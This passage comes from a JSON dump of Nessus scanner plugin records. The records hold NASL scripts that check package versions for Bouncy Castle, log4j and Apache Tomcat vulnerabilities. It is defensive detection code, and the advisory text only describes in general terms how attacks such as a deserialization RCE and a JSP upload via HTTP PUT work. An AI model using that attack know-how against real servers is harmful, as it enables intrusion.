"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libbcmail-java", "p-cpe:/a:debian:debian_linux:libbcmail-java-doc", "p-cpe:/a:debian:debian_linux:libbcmail-java-gcj", "p-cpe:/a:debian:debian_linux:libbcpg-java", "p-cpe:/a:debian:debian_linux:libbcpg-java-doc", "p-cpe:/a:debian:debian_linux:libbcpg-java-gcj", "p-cpe:/a:debian:debian_linux:libbcprov-java", "p-cpe:/a:debian:debian_linux:libbcprov-java-doc", "p-cpe:/a:debian:debian_linux:libbcprov-java-gcj", "p-cpe:/a:debian:debian_linux:libbctsp-java", "p-cpe:/a:debian:debian_linux:libbctsp-java-doc", "p-cpe:/a:debian:debian_linux:libbctsp-java-gcj", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-361.NASL", "href": "https://www.tenable.com/plugins/nessus/87266", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-361-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87266);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7940\");\n\n script_name(english:\"Debian DLA-361-1 : bouncycastle security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Bouncy Castle Java library before 1.51 does not validate that a\npoint is within the elliptic curve, which makes it easier for remote\nattackers to obtain private keys via a series of crafted elliptic\ncurve Diffie Hellman (ECDH) key exchanges, aka an 'invalid curve\nattack.'\n\nFor Debian 6 'Squeeze', this issue has been fixed in\nversion 1.44+dfsg-2+deb6u1 of bouncycastle.\n\nMany thanks to upstream author Peter Dettmann who reviewed the\nbackport that we prepared.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/12/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/bouncycastle\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcmail-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcmail-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcmail-java-gcj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcpg-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcpg-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcpg-java-gcj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcprov-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcprov-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcprov-java-gcj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbctsp-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbctsp-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbctsp-java-gcj\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libbcmail-java\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcmail-java-doc\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcmail-java-gcj\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcpg-java\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcpg-java-doc\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcpg-java-gcj\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcprov-java\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcprov-java-doc\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcprov-java-gcj\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbctsp-java\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbctsp-java-doc\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbctsp-java-gcj\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:56:54", "description": "Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "Fedora 24 : log4j12 (2017-7e0ff7f73a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:log4j12", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-7E0FF7F73A.NASL", "href": "https://www.tenable.com/plugins/nessus/100745", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-7e0ff7f73a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100745);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5645\");\n script_xref(name:\"FEDORA\", value:\"2017-7e0ff7f73a\");\n\n script_name(english:\"Fedora 24 : log4j12 (2017-7e0ff7f73a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-7e0ff7f73a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected log4j12 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:log4j12\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"log4j12-1.2.17-19.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j12\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:56:34", "description": "Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "Fedora 25 : log4j12 (2017-8348115acd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:log4j12", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-8348115ACD.NASL", "href": "https://www.tenable.com/plugins/nessus/100746", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-8348115acd.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100746);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5645\");\n script_xref(name:\"FEDORA\", value:\"2017-8348115acd\");\n\n script_name(english:\"Fedora 25 : log4j12 (2017-8348115acd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-8348115acd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected log4j12 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:log4j12\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"log4j12-1.2.17-19.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j12\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:58:58", "description": "Security Fix(es) :\n\n - It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645)", "cvss3": {}, "published": "2017-08-22T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : log4j on SL7.x (noarch) (20170807)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:log4j", "p-cpe:/a:fermilab:scientific_linux:log4j-javadoc", "p-cpe:/a:fermilab:scientific_linux:log4j-manual", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20170807_LOG4J_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/102666", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102666);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-5645\");\n\n script_name(english:\"Scientific Linux Security Update : log4j on SL7.x (noarch) (20170807)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - It was found that when using remote logging with log4j\n socket server the log4j server would deserialize any log\n event received via TCP or UDP. An attacker could use\n this flaw to send a specially crafted log event that,\n during deserialization, would execute arbitrary code in\n the context of the logger application. (CVE-2017-5645)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1708&L=scientific-linux-errata&F=&S=&P=5404\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?20734978\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected log4j, log4j-javadoc and / or log4j-manual\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:log4j-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:log4j-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", reference:\"log4j-1.2.17-16.el7_4\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"log4j-javadoc-1.2.17-16.el7_4\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"log4j-manual-1.2.17-16.el7_4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j / log4j-javadoc / log4j-manual\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:02:24", "description": "The version of Apache Tomcat installed on the remote host is 9.0.0.M1 or later but prior to 9.0.1. It is, therefore, affected by an unspecified vulnerability when running with HTTP PUTs enabled (e.g.\nvia setting the readonly initialization parameter of the Default to false) that makes it possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.\n\nNote that Nessus has not attempted to exploit this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-10-06T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.0.0.M1 < 9.0.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12617"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_9_0_1.NASL", "href": "https://www.tenable.com/plugins/nessus/103699", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103699);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-12617\");\n script_bugtraq_id(100954);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Apache Tomcat 9.0.0.M1 < 9.0.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 9.0.0.M1\nor later but prior to 9.0.1. It is, therefore, affected by an\nunspecified vulnerability when running with HTTP PUTs enabled (e.g.\nvia setting the readonly initialization parameter of the Default to\nfalse) that makes it possible to upload a JSP file to the server via\na specially crafted request. This JSP could then be requested and any\ncode it contained would be executed by the server.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.\");\n # https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb@%3Cannounce.tomcat.apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f047e41\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 9.0.1 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12617\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"9.0.1\", min:\"9.0.0.M1\", severity:SECURITY_WARNING, granularity_regex:\"^9(\\.0)?$\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:13:12", "description": "The version of Apache Tomcat installed on the remote host is 8.0.0.RC1 or later but prior to 8.0.47. It is, therefore, affected by an unspecified vulnerability when running with HTTP PUTs enabled (e.g.\nvia setting the readonly initialization parameter of the Default to false) that makes it possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.\n\nNote that Nessus has not attempted to exploit this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-10-06T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.0.0.RC1 < 8.0.47 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12617"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_0_47.NASL", "href": "https://www.tenable.com/plugins/nessus/103697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103697);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-12617\");\n script_bugtraq_id(100954);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Apache Tomcat 8.0.0.RC1 < 8.0.47 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is\n8.0.0.RC1 or later but prior to 8.0.47. It is, therefore, affected by\nan unspecified vulnerability when running with HTTP PUTs enabled (e.g.\nvia setting the readonly initialization parameter of the Default to\nfalse) that makes it possible to upload a JSP file to the server via a\nspecially crafted request. This JSP could then be requested and any\ncode it contained would be executed by the server.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.\");\n # https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb@%3Cannounce.tomcat.apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f047e41\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 8.0.47 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12617\");\n\n 